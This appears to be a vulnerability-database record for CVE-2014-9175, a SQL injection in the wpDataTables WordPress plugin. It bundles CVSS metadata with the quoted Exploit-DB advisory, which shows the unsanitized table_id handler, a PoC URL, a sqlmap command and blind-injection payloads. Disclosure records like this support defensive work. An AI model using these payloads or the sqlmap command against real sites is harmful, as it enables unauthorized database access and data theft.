ID CVE-2014-9175Type cveReporter cve@mitre.orgModified 2017-09-08T01:29:00
Description
SQL injection vulnerability in wpdatatables.php in the wpDataTables plugin 1.5.3 and earlier for WordPress allows remote attackers to execute arbitrary SQL commands via the table_id parameter in a get_wdtable action to wp-admin/admin-ajax.php.
{"id": "CVE-2014-9175", "bulletinFamily": "NVD", "title": "CVE-2014-9175", "description": "SQL injection vulnerability in wpdatatables.php in the wpDataTables plugin 1.5.3 and earlier for WordPress allows remote attackers to execute arbitrary SQL commands via the table_id parameter in a get_wdtable action to wp-admin/admin-ajax.php.", "published": "2014-12-02T16:59:00", "modified": "2017-09-08T01:29:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9175", "reporter": "cve@mitre.org", "references": ["http://www.homelab.it/index.php/2014/11/23/wordpress-wpdatatables-sql-injection-vulnerability", "https://exchange.xforce.ibmcloud.com/vulnerabilities/98928", "http://www.exploit-db.com/exploits/35340", "http://www.securityfocus.com/bid/71271", "http://packetstormsecurity.com/files/129232/WordPress-wpDataTables-1.5.3-SQL-Injection.html"], "cvelist": ["CVE-2014-9175"], "type": "cve", "lastseen": "2019-05-29T18:13:49", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "712b3670687bfde43c76003d7ef273ec"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvelist", "hash": "d68c9858b8fa19c8af23d2ab6d430b83"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "27c7580c75f8189a2ddd31c96c2f7e2b"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "4994f73f97fee1825d38aac7bee9aefe"}, {"key": "description", "hash": "0c378bceb3877a3142a6268c305d8186"}, {"key": "href", "hash": "afa3f477b29295d547c112274c6e975a"}, {"key": "modified", "hash": "4a649d4c42bfbd791fda30fc0d1594aa"}, {"key": "published", "hash": "089702cc9fc904f1e9bfe7ad853727e8"}, {"key": "references", "hash": "0920d823c908b5a2889f11f552842f6a"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "68dfcdeeada7cbcf81861976bcd6081f"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "b35bea248b76c18fb691a4b869f409f83f827549f9acd47bcaf0bd7335828db1", "viewCount": 2, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2019-05-29T18:13:49", "rev": 2}, "dependencies": {"references": [{"type": "wpvulndb", "idList": ["WPVDB-ID:7689"]}, {"type": "exploitdb", "idList": ["EDB-ID:35340"]}], "modified": "2019-05-29T18:13:49", "rev": 2}, "vulnersScore": 7.3}, "objectVersion": "1.3", "cpe": [], "affectedSoftware": [{"name": "wpdatatables wpdatatables", "operator": "le", "version": "1.5.3"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": [], "cwe": ["CWE-89"]}
{"wpvulndb": [{"lastseen": "2020-06-29T19:29:04", "bulletinFamily": "software", "description": "WordPress Vulnerability - wpDataTables <= 1.5.3 - SQL Injection\n", "modified": "2019-10-21T00:00:00", "published": "2014-11-25T00:00:00", "id": "WPVDB-ID:7689", "href": "https://wpvulndb.com/vulnerabilities/7689", "type": "wpvulndb", "title": "wpDataTables <= 1.5.3 - SQL Injection", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-04T01:06:37", "bulletinFamily": "exploit", "description": "Wordpress wpDataTables Plugin 1.5.3 - SQL Injection Vulnerability. CVE-2014-9175. Webapps exploit for php platform", "modified": "2014-11-24T00:00:00", "published": "2014-11-24T00:00:00", "id": "EDB-ID:35340", "href": "https://www.exploit-db.com/exploits/35340/", "type": "exploitdb", "title": "WordPress wpDataTables Plugin 1.5.3 - SQL Injection Vulnerability", "sourceData": "######################\r\n\r\n# Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability\r\n\r\n# Exploit Author : Claudio Viviani \r\n\r\n# Software Link : http://wpdatatables.com (Premium)\r\n\r\n# Date : 2014-11-22\r\n\r\n# Tested on : Windows 7 / Mozilla Firefox\r\n Windows 7 / sqlmap (0.8-1)\r\n Linux / Mozilla Firefox\r\n Linux / sqlmap 1.0-dev-5b2ded0\r\n\r\n######################\r\n\r\n\r\n# Description\r\n\r\nWordpress wpDataTables 1.5.3 and below suffers from SQL injection vulnerability\r\n\r\n\"table_id\" variable is not sanitized.\r\n\r\nFile: wpdatatables.php\r\n------------------------\r\n // AJAX-handlers\r\n add_action( 'wp_ajax_get_wdtable', 'wdt_get_ajax_data' );\r\n add_action( 'wp_ajax_nopriv_get_wdtable', 'wdt_get_ajax_data' );\r\n\r\n\t/**\r\n\t * Handler which returns the AJAX response\r\n\t */\r\n\t function wdt_get_ajax_data(){\r\n\t \t$id = $_GET['table_id']; <------------------- Not Sanitized!\r\n\t \t$table_data = wdt_get_table_by_id( $id );\r\n\t \t$column_data = wdt_get_columns_by_table_id( $id );\r\n\t \t$column_headers = array();\r\n\t \t$column_types = array();\r\n\t \t$column_filtertypes = array();\r\n\t \t$column_inputtypes = array();\r\n\t\t foreach($column_data as $column){\r\n\t\t \t\t$column_order[(int)$column->pos] = $column->orig_header;\r\n\t\t \t\tif($column->display_header){\r\n\t\t\t \t\t$column_headers[$column->orig_header] = $column->display_header;\r\n\t\t \t\t}\r\n\t\t \t\tif($column->column_type != 'autodetect'){\r\n\t\t\t \t\t$column_types[$column->orig_header] = $column->column_type;\r\n\t\t \t\t}else{\r\n\t\t\t \t\t$column_types[$column->orig_header] = 'string';\r\n\t\t \t\t}\t\r\n\t\t \t\t$column_filtertypes[$column->orig_header] = $column->filter_type;\r\n\t\t \t\t$column_inputtypes[$column->orig_header] = $column->input_type;\r\n\t\t }\r\n------------------------\r\n\r\n(The vulnerable variable is located in others php files)\r\n\r\n\r\n######################\r\n\r\n# PoC\r\n\r\nhttp://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1 [Sqli]\r\n\r\n# Sqlmap\r\n\r\nsqlmap -u \"http://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1\" -p table_id --dbms mysql\r\n\r\n---\r\nParameter: table_id\r\n Type: boolean-based blind\r\n Title: AND boolean-based blind - WHERE or HAVING clause\r\n Payload: action=get_wdtable&table_id=1 AND 9029=9029\r\n\r\n Type: AND/OR time-based blind\r\n Title: MySQL > 5.0.11 AND time-based blind\r\n Payload: action=get_wdtable&table_id=1 AND SLEEP(5)\r\n\r\n---\r\n\r\n\r\n#####################\r\n\r\nDiscovered By : Claudio Viviani\r\n http://www.homelab.it\r\n\t\t\r\n info@homelab.it\r\n homelabit@protonmail.ch\r\n\r\n https://www.facebook.com/homelabit\r\n https://twitter.com/homelabit\r\n https://plus.google.com/+HomelabIt1/\r\n https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww\r\n\r\n#####################", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/35340/"}]}
